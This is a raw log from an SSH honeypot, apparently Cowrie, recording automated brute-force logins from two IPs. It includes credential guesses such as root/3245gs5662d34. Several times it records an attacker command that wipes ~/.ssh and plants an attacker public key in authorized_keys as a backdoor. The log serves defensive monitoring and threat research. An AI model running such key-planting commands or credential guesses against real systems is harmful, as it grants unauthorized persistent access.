{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:57:38.205120Z","src_ip":"212.227.235.229","session":"38e14fbefa7c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T07:57:38.205786Z","src_ip":"212.227.235.229","session":"38e14fbefa7c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T07:57:38.206719Z","src_ip":"212.227.235.229","session":"38e14fbefa7c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:57:38.292966Z","src_ip":"212.227.235.229","session":"38e14fbefa7c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:57:38.525609Z","src_ip":"212.227.235.229","session":"38e14fbefa7c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T07:57:38.526279Z","src_ip":"212.227.235.229","session":"38e14fbefa7c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T07:57:38.615298Z","src_ip":"212.227.235.229","session":"38e14fbefa7c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:57:38.616122Z","src_ip":"212.227.235.229","session":"38e14fbefa7c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59350,"dst_ip":"1.2.3.4","dst_port":22,"session":"6820baec4c2f","protocol":"ssh","message":"New connection: 212.227.235.229:59350 (1.2.3.4:22) [session: 6820baec4c2f]","sensor":"my-vps","timestamp":"2025-09-09T07:57:38.697766Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:57:38.698500Z","src_ip":"212.227.235.229","session":"6820baec4c2f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:57:38.783937Z","src_ip":"212.227.235.229","session":"6820baec4c2f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T07:57:39.167377Z","src_ip":"212.227.235.229","session":"6820baec4c2f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:57:40.253530Z","src_ip":"212.227.235.229","session":"6820baec4c2f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59362,"dst_ip":"1.2.3.4","dst_port":22,"session":"cae2395f29c2","protocol":"ssh","message":"New connection: 212.227.235.229:59362 (1.2.3.4:22) [session: cae2395f29c2]","sensor":"my-vps","timestamp":"2025-09-09T07:57:40.337308Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:57:40.338053Z","src_ip":"212.227.235.229","session":"cae2395f29c2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:57:40.422276Z","src_ip":"212.227.235.229","session":"cae2395f29c2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:57:40.797724Z","src_ip":"212.227.235.229","session":"cae2395f29c2"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:57:40.885296Z","src_ip":"212.227.235.229","session":"38e14fbefa7c"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:57:40.886144Z","src_ip":"212.227.235.229","session":"cae2395f29c2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45758,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e6932c1d3e2","protocol":"ssh","message":"New connection: 212.227.125.160:45758 (1.2.3.4:22) [session: 1e6932c1d3e2]","sensor":"my-vps","timestamp":"2025-09-09T07:57:44.497256Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-09-09T07:57:44.498831Z","src_ip":"212.227.125.160","session":"1e6932c1d3e2"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-09-09T07:57:45.984145Z","src_ip":"212.227.125.160","session":"1e6932c1d3e2"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-09-09T07:57:47.953865Z","src_ip":"212.227.125.160","session":"1e6932c1d3e2"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:57:51.477789Z","src_ip":"212.227.125.160","session":"1e6932c1d3e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57854,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6f61771c2c7","protocol":"ssh","message":"New connection: 212.227.125.160:57854 (1.2.3.4:22) [session: b6f61771c2c7]","sensor":"my-vps","timestamp":"2025-09-09T07:58:21.969917Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-09-09T07:58:21.976810Z","src_ip":"212.227.125.160","session":"b6f61771c2c7"}
{"eventid":"cowrie.session.closed","duration":"24.5","message":"Connection lost after 24.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:58:46.496294Z","src_ip":"212.227.125.160","session":"b6f61771c2c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55916,"dst_ip":"1.2.3.4","dst_port":22,"session":"7809a3b13ed0","protocol":"ssh","message":"New connection: 212.227.235.229:55916 (1.2.3.4:22) [session: 7809a3b13ed0]","sensor":"my-vps","timestamp":"2025-09-09T07:58:50.984868Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:58:50.985970Z","src_ip":"212.227.235.229","session":"7809a3b13ed0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:58:51.069769Z","src_ip":"212.227.235.229","session":"7809a3b13ed0"}
{"eventid":"cowrie.login.success","username":"root","password":"k@12345678","message":"login attempt [root/k@12345678] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:58:51.455351Z","src_ip":"212.227.235.229","session":"7809a3b13ed0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:58:51.648759Z","src_ip":"212.227.235.229","session":"7809a3b13ed0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T07:58:51.649843Z","src_ip":"212.227.235.229","session":"7809a3b13ed0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T07:58:51.651286Z","src_ip":"212.227.235.229","session":"7809a3b13ed0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:58:51.737402Z","src_ip":"212.227.235.229","session":"7809a3b13ed0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:58:52.016060Z","src_ip":"212.227.235.229","session":"7809a3b13ed0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T07:58:52.016809Z","src_ip":"212.227.235.229","session":"7809a3b13ed0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T07:58:52.102598Z","src_ip":"212.227.235.229","session":"7809a3b13ed0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:58:52.103513Z","src_ip":"212.227.235.229","session":"7809a3b13ed0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55918,"dst_ip":"1.2.3.4","dst_port":22,"session":"310cf668654c","protocol":"ssh","message":"New connection: 212.227.235.229:55918 (1.2.3.4:22) [session: 310cf668654c]","sensor":"my-vps","timestamp":"2025-09-09T07:58:52.186000Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:58:52.186555Z","src_ip":"212.227.235.229","session":"310cf668654c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:58:52.270276Z","src_ip":"212.227.235.229","session":"310cf668654c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T07:58:52.652003Z","src_ip":"212.227.235.229","session":"310cf668654c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:58:53.738936Z","src_ip":"212.227.235.229","session":"310cf668654c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41366,"dst_ip":"1.2.3.4","dst_port":22,"session":"1813e1700212","protocol":"ssh","message":"New connection: 212.227.235.229:41366 (1.2.3.4:22) [session: 1813e1700212]","sensor":"my-vps","timestamp":"2025-09-09T07:58:53.821964Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:58:53.822829Z","src_ip":"212.227.235.229","session":"1813e1700212"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:58:53.906565Z","src_ip":"212.227.235.229","session":"1813e1700212"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:58:54.285510Z","src_ip":"212.227.235.229","session":"1813e1700212"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:58:54.371774Z","src_ip":"212.227.235.229","session":"7809a3b13ed0"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:58:54.372770Z","src_ip":"212.227.235.229","session":"1813e1700212"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57626,"dst_ip":"1.2.3.4","dst_port":22,"session":"39cbcd331230","protocol":"ssh","message":"New connection: 212.227.125.160:57626 (1.2.3.4:22) [session: 39cbcd331230]","sensor":"my-vps","timestamp":"2025-09-09T08:00:02.743648Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58620,"dst_ip":"1.2.3.4","dst_port":22,"session":"67947d3f6272","protocol":"ssh","message":"New connection: 212.227.235.229:58620 (1.2.3.4:22) [session: 67947d3f6272]","sensor":"my-vps","timestamp":"2025-09-09T08:00:02.984846Z"}
